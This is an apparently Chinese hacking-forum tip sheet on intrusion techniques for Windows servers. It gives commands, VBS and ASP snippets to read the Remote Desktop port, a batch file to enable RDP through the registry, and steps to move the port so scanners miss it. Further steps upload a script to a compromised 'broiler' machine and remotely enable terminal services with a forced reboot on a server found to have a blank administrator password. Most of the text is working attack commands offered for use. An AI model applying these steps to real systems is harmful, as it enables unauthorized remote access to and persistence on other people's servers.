入侵过程中小技巧总结

鸡春

查看3389端口总结

一、导出注册表法

regedit /e tsport.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"

然后 type tsport.reg | find "PortNumber"

结果如果是d3d的话就证明是3389端口
如果是其他的 转换成10进制就可以了。

二、脚本利用法

Dim ReadComputerName
Set ReadComputerName=WScript.CreateObject("WScript.Shell")
Dim TSName,TSRegPath
TSRegPath="HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber"
TSName=ReadComputerName.RegRead(TSRegPath)
WScript.Echo("终端端口为"&TSName)
WScript.Echo()
WScript.Echo("本程序是帮助你找到终端的端口")
WScript.Echo("http://Www.HackPixy.Com&qu...
WScript.Echo("Pixy")

把以上代码保存为vbs文件，如“3389port.vbs”
然后在命令行下运行cscript 3389port.vbs 即可查看终端端口（桌面环境下可直接点击查看）。

三、ASP实现法

sub get_terminal_port()
terminal_port_path="HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\"
terminal_port_key="PortNumber"
termport=wsh.regread(terminal_port_path&terminal_port_key)
if termport="" or err.number<>0 then
response.write "无法得到终端服务端口。请检查权限是否已经受到限制。<br>"
else
response.write "当前终端服务端口: "&termport&"<br>"
end if
end sub

四、利用工具

C3389.exe

=========================================================
开启XP And 2003终端的方法
xp、2003开终端的方法和2000、nt（ts version）不一样，不是通过安装，因为xp、2003已经自动安装的远程桌面功能，只是启动不启动的问题。
通过下面这个批处理就能在命令行下激活xp、2003的远程桌面功能

echo windows registry editor version 5.00>>3389.reg
echo [hkey_local_machine\system\currentcontrolset\control\terminal server]>>3389.reg
echo "fdenytsconnections"=dword:00000000>>3389.reg
echo [hkey_local_machine\system\currentcontrolset\control\terminal server\wds\rdpwd\tds\tcp]>>3389.reg
echo "portnumber"=dword:00000d3d>>3389.reg
echo [hkey_local_machine\system\currentcontrolset\control\terminal server\winstations\rdp-tcp]>>3389.reg
echo "portnumber"=dword:00000d3d>>3389.reg
regedit /s 3389.reg
del 3389.reg

=========================================================
修改3389端口方法（修改后不易被扫出）
修改服务器端的端口设置,注册表有2个地方需要修改

[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
PortNumber值，默认是3389，修改成所希望的端口，比如6000

第二个地方：
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp]　
PortNumber值，默认是3389，修改成所希望的端口，比如6000

现在这样就可以了。重启系统就可以了.

==============================================================
打开3389端口的5种方法
怎么样开3389端口，这里我把他们总结一下，很全面,希望对你有用:
1，打开记事本，编辑内容如下：
echo [Components] > c:\sql
echo TSEnable = on >> c:\sql
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
编辑好后存为BAT文件，上传至肉鸡，执行。这里值得注意的是要确定winnt是否在c盘，如果在其他盘则需要改动。

2 (对xp\2000都有效) 脚本文件 本地开3389 工具:rots1.05
使用方法：
在命令行方式下使用windows自带的脚本宿主程序cscript.exe调用脚本，例如：


c:\>cscript ROTS.vbs <目标IP> <用户名> <密码> [服务端口] [自动重起选项]


服务端口： 设置终端服务的服务端口。默认是3389。
自动重起选项： 使用/r表示安装完成后自动重起目标使设置生效。
使用/fr表示强制重起目标。（如果/r不行，可以试试这个）
使用此参数时，端口设置不能忽略。


比如扫描到了一个有NT弱口令的服务器，IP地址是222.222.222.222，管理员帐户是administrator，密码为空
运行CMD（2000下的DOS），我们给它开终端！
命令如下！
cscript reg.vbe 222.222.222.222 administrator "" 3389 /fr
上面的命令应该可以理解吧？cscript reg.vbe这是命令，后面的是IP，然后是管理员帐户，接这是密码，因为222.222.222.222 这台服务器的管理员密码是空的，那就用双引号表示为空，再后面是端口，你可以任意设置终端的端口，/fr是重启命令（强制重启，一般我都用这个，你也可以/r，这是普通重启）


脚本会判断目标系统类型，如果不是server及以上版本，就会提示你是否要取消。
因为pro版不能安装终端服务。
如果你确信脚本判断错误，就继续安装好了。